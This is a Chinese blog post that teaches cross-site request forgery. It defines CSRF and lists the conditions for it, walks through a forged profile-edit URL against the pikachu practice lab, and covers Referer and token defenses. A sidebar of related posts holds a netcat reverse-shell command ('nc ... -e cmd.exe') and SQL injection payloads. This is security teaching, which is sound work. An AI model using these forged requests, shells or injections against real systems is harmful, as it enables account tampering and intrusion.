CSRF漏洞

最新推荐文章于 2023-11-13 17:18:03 发布
最新推荐文章于 2023-11-13 17:18:03 发布
阅读量167 收藏
点赞数
分类专栏: 网络安全 CSRF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ws1813004226/article/details/116786310
版权

什么是CSRF?

CSRF就是跨站请求伪造,由于其具有一次性,故也被称为:One Click Attack 或session Riding。攻击者利用目标用户的身份,以目标用户的身份执行某些非法操作。

CSRF能够做什么?

以目标用户的名义发送邮件,发消息,盗取用户账号,甚至购买商品,虚拟货币转账,这会泄露个人隐私并威胁到用户财产安全。

CSRF形成条件

(1)用户登录了网站,能够执行网站功能。
(2)目标用户访问了攻击者构造的URL。
(3)session或cookie有效。

实例

我们以pikachu靶场为例,我们在信息修改页面点击提交,然后用burp进行抓包。
在这里插入图片描述
在这里插入图片描述
我们将GET请求头中的信息复制出来,然后修改其中的电话号码和住址等信息,最后补全URL,发送给目标用户,这里我们直接访问以下URL:

http://192.168.59.1:8080/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=%E7%94%B7&phonenum=13015483023&add=china&email=www&submit=submit

访问之后如果被攻击者此时登录状态或cookie/session没有过期,则其信息会被修改。
在这里插入图片描述

防御方法

(1)验证请求的referer值,如果referer是以自己的网站开头的域名,则说明该请求来自网站自己,是合法的。如果referer是其他网站域名或空白,就有可能是CSRF攻击,那么服务器应该拒绝该请求,但是此方法存在被绕过的可能。
(2)在http请求中以参数的形式加入一个随机的token,并在服务端验证token,如果请求中没有token或token内容不正确,则认为该请求可能是CSRF从而拒绝该请求。

树火
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
websocket 跨域_浅谈WebSocket跨域劫持漏洞(CSWSH)
weixin_30800151的博客
01-23 928
WebSocket 跨域劫持漏洞WebSocket 跨域劫持漏洞,英文名:Cross-site WebSocket Hijacking,漏洞类型:全能型CSRF(可读、可写)。了解WebSocketWebsocket 优点支持双向通信,实时性更强。更好的二进制支持。较少的控制开销。连接创建后,ws客户端、服务端进行数据交换时,协议控制的数据包头部较小。在不包含头部的情况下,服务端到客户端的包头只有...
csrf漏洞
m0_55772907的博客
04-27 706
  CSRF(Cross-site Request Forgery,跨站请求伪造),缩写CSRF,也有少数文章称为XSRF,一种利用用户在当前已登录的Web应用程序上执行非本意作的攻击方法(利用受害者尚未失效的身份认证信息(cookie,会话等),创建恶意伪造的web页面请求,在受害者不知情的情况下向服务器发送请求完成非法作(转账、改密等))。   简言之,攻击者间接利用受害者合法身份,以其身份发送恶意请求。 1.2 漏洞实质   攻击者通过技术手段欺骗用户的浏览器访问
CSRF 漏洞
Just a Blog
03-26 884
CSRF 漏洞
CSRF 漏洞详解
最新发布
一个努力学习网安的小牛马
11-13 560
CSRF漏洞详解
CSRF漏洞详解
渗透测试研究中心
06-10 925
0x01 CSRF定义   CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。尽管听起来像跨站脚本XSS,但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流...
【web渗透】CSRF漏洞详细讲解
qinshuoyang1的博客
08-03 6002
CSRF(Cross-Site Request Forgery),也被称为 one-click attack 或者 session riding,即跨站请求伪造攻击。
hucart-含有CSRF漏洞的源码.zip
12-31
在这个案例中,"hucart-含有CSRF漏洞的源码.zip" 提供了一个实际的示例,让我们深入探讨一下CSRF漏洞的原理、危害以及防范措施。 1. **CSRF漏洞原理**: CSRF漏洞通常发生在Web应用程序中,这些应用未对请求进行...
CSRF漏洞的靶场实验
09-19
在“CSRF漏洞的靶场实验”中,我们将通过实际作来理解这种攻击方式以及如何防御。 首先,我们需要了解CSRF攻击的基本原理。当用户访问一个网站并登录后,浏览器会保存一个叫做会话(Session)的状态,使得用户在...
CSRFScanner:Python CSRF漏洞扫描器
05-06
Python CSRF漏洞扫描器 描述 CSRFScanner是一种用于扫描网站以查找CSRF漏洞的工具。 这是一个基本工具,不是很人性化,我最初是出于学术目的而开发的。 可以在PDF CSRFScanner_Explications.pdf(以法语编写)中...
CSRF漏洞防御-01
09-15
"CSRF漏洞防御-01" CSRF漏洞防御是一种非常重要的安全机制,它可以防止恶意攻击者对Web应用程序的攻击。CSRF漏洞防御主要包括四种方法:验证码防御、Referer Check防御、Anti CSRF Token防御和Token泄露。 验证码...
CSRF漏洞利用方法-01
09-15
CSRF漏洞利用方法 CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的Web应用安全漏洞攻击者可以利用CSRF漏洞来欺骗用户浏览器执行恶意作。本文将介绍四种CSRF漏洞利用方法,分别是链接利用、...
常见网络安全设备
ws1813004226的博客
06-03 8304
一、防火墙 定位:访问控制类产品,网络出现后的第一类安全产品。 功能:隔离内网、外网以及DMZ区(业务系统对外发布区,Web应用服务器,邮件服务器等)并控制用户访问。 部署方式:通常部署在网络边界或者重要系统边界。通常工作在网络层。 二、IPS 定位:访问控制类产品,入侵防御系统。 功能:能够对流经设备的网络流量进行分析、监控,最重要的是发现攻击后,能够及时拦截阻断。它是防火墙的重要补充。如果说防火墙是第一道防御线,那么IPS就是第二道。 部署方式:通常串接在网络主干链路上,或者重要业务系统边界,通常由防火
Windows下反弹shell的方式
ws1813004226的博客
05-25 5741
一、Windows下反弹shell 1.nc反弹 (1)我们先在被控制主机下载netcat。netcat下载 (2)cmd下打开下载目录,输入: nc 192.168.59.131 9999 -e C:\Users\21124\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cmd.exe(本机cmd文件路径) (3)可以看到shell是反弹回来的,但是可能由于防火墙的原因,控制极其不稳定。 2.msf反弹 (1)
Linux下反弹shell的方式
ws1813004226的博客
05-25 958
一、什么是shell? shell是渗透中常用的名词,像getshell,webshell,反弹shell等等,都和shell相关。 getshell:获取到目标的命令执行权限。 webshell:指网站后门,通过web服务进行命令执行。 反弹shell:把命令行的输入输出转移到其它主机。 Shell 俗称壳(用来区别于核),是指“为使用者提供作界面”的软件(命令解析器)。它类似于DOS下的command.com和后来的cmd.exe。它接收用户命令,然后调用相应的应用程序。简单说用户通过壳(shell)
SQL注入之盲注(boolean盲注和时间盲注)
ws1813004226的博客
05-12 751
一、boolen盲注 boolen就是系统屏蔽返回错误信息,只返回是或不是,所以我们不能直观的得到数据库信息,在这里,我们就只能通过boolen盲注进行注入。 我们依旧使用pikachu靶场进行测试,这里肯定是存在SQL注入的,就不再多作演示。 我们先看一下为什么这里只能用boolen注入。我们在union和boolen注入处都输入: kobe' order by 3# 可以看到,uhion注入是不屏蔽报错信息的,而boolen注入只显示你输入有误,屏蔽了报错信息。 而只有当我们输入正确的时候,才会返
union注入之字符型注入和数值型注入
ws1813004226的博客
05-12 705
什么是SQL注入? SQL注入就是web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带进数据库查询,攻击者可以通过构造不同的SQL语句实现对数据库的任意作。 字符型注入 判断方法:当输入的参数类型为字符型时,数据库执行的查询语句为:select * from users where id=‘x’,我们可以使用’1’=‘1和’1’=‘2判断是否存在SQL注入。 url 地址中输入 http://xxx/abc.php?id= x’ and ‘1’=‘1 页面运行正常,继
宽字节注入和报错注入
ws1813004226的博客
05-25 512
宽字节注入 1.什么是宽字节 当某字符的大小为一个字节时,称其字符为窄字节; 当某字符的大小为两个字节时,称其字符为宽字节; 所有英文默认占一个字节,汉字占两个字节。 常见的宽字节编码:GB2312,GBK,GB18030,BIG5,Shift_JIS等等 2.注入条件 (1)数据库使用了gbk编码. (2)使用了过滤函数,将用户输入的单引号转义(mysql_real_escape_string,addslashes) 这样被处理后的sql语句中,单引号不再具有‘作用’,仅仅是‘内容’而已,换句话说,这个单
csrf漏洞dvwa
09-13
CSRF(Cross-Site Request Forgery)是一种常见的Web应用程序安全漏洞,导致攻击者利用受害者的身份执行恶意作。DVWA(Damn Vulnerable Web Application)是一个故意设计的Web应用程序,用于演示各种Web安全漏洞。 在DVWA中,可以找到一些关于CSRF漏洞的练习。要利用CSRF漏洞攻击者需要诱使受害者访问一个包含恶意请求的网页。当受害者登录到DVWA并点击了这个网页时,他们的作将被误导到执行攻击者指定的作,而不是预期的作。 在DVWA中,可以通过以下步骤来进行CSRF漏洞的测试和练习: 1. 打开DVWA,并确保已登录到应用程序。 2. 导航到"CSRF"页面或相关部分。 3. 查看该页面中的HTML源代码,查找表单或其他用户交互元素。 4. 创建一个包含恶意请求的HTML网页,可以使用类似于`<img>`或`<iframe>`标签来隐藏请求。 5. 在恶意网页中,构造一个针对目标用户的请求(例如更改密码、删除帐户等)。 6. 将恶意网页上传到一个服务器,并确保可以通过URL访问。 7. 诱使受害者点击恶意网页的链接。 8. 如果CSRF漏洞存在,并且受害者已经登录到DVWA,攻击者指定的作将在受害者不知情的情况下执行。 请注意,演示和测试CSRF漏洞时需要遵守法律和道德规范。仅限于在授权的环境中进行此类活动,并且始终要尊重隐私权和合法性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值